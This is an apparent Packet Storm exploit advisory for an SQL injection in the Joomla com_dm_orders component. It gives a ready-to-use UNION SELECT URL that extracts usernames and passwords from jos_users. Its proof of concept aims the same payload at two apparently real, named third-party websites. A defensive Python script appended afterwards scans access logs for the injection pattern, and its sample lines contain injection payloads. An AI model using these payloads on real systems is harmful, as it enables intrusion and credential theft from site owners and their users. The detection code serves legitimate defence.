Joomla DM Orders SQL Injection

2010-01-07T00:00:00
ID PACKETSTORM:84898
Type packetstorm
Reporter NoGe
Modified 2010-01-07T00:00:00

Description

                                        
`==============================================================================
  
  
[o] Joomla Components [ com_dm_orders ] SQL Injection Vulnerability  
  
Software : com_dm_orders [ joomla components ]  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com/  
  
  
==============================================================================  
  
  
[o] Exploit  
  
http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1  
  
  
  
[o] Proof of Concept  
  
http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54  
http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54  
  
  
==============================================================================  
  
  
[o] Greetz  
  
Anti Security [ http://antisecurity.org ]  
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe  
H312Y yooogy mousekill }^-^{ martfella noname s4va  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
==============================================================================  
  
`
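
A defender-side check for the request shape in this advisory, added here as an example and not part of the original advisory or the component's code: it scans access-log lines for `option=com_dm_orders` requests whose `id` parameter is not a plain integer. The log lines are constructed samples, and treating `id` as a value that should always be a non-negative integer is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Keyword hints only label a hit; the integer allowlist below does the flagging.
SQL_HINT_RE = re.compile(r"\b(?:union|select|group_concat|from)\b|--|0x[0-9a-f]+", re.I)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Jan/2010:10:01:02 +0000] "GET /index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=12&Itemid=54 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Jan/2010:10:03:44 +0000] "GET /index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,2,3--&Itemid=1 HTTP/1.1" 200 7311',
    '203.0.113.9 - - [07/Jan/2010:10:03:51 +0000] "GET /index.php?option=com_dm_orders&task=order_form&id=-1%20UNION%20SELECT%201 HTTP/1.1" 200 7311',
    '198.51.100.7 - - [07/Jan/2010:10:04:10 +0000] "GET /index.php?option=com_content&view=article&id=3:about HTTP/1.1" 200 900',
    '192.0.2.44 - - [07/Jan/2010:10:05:00 +0000] "GET /index.php?option=com_dm_orders&task=order_form&id=abc HTTP/1.1" 200 4100',
]


def classify(line):
    """Return None for unrelated lines, else (verdict, decoded id value)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs decodes both '+' and %xx, so encoded payloads are normalised.
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_dm_orders" not in query.get("option", []):
        return None
    # Check every id value: a repeated parameter must not hide a bad one.
    bad = [v for v in query.get("id", []) if not re.fullmatch(r"[0-9]+", v)]
    if not bad:
        return "ok", ""
    hits = [v for v in bad if SQL_HINT_RE.search(v)]
    return ("sqli", hits[0]) if hits else ("malformed", bad[0])


def scan(lines):
    """Return (line_number, verdict, decoded_id) for every flagged request."""
    flagged = []
    for number, line in enumerate(lines, 1):
        result = classify(line)
        if result and result[0] != "ok":
            flagged.append((number, *result))
    return flagged


if __name__ == "__main__":
    for number, verdict, value in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}: id={value!r}")
```

Access logs record only the query string, so the same parameters sent in a POST body would need the check applied at the application or WAF layer instead.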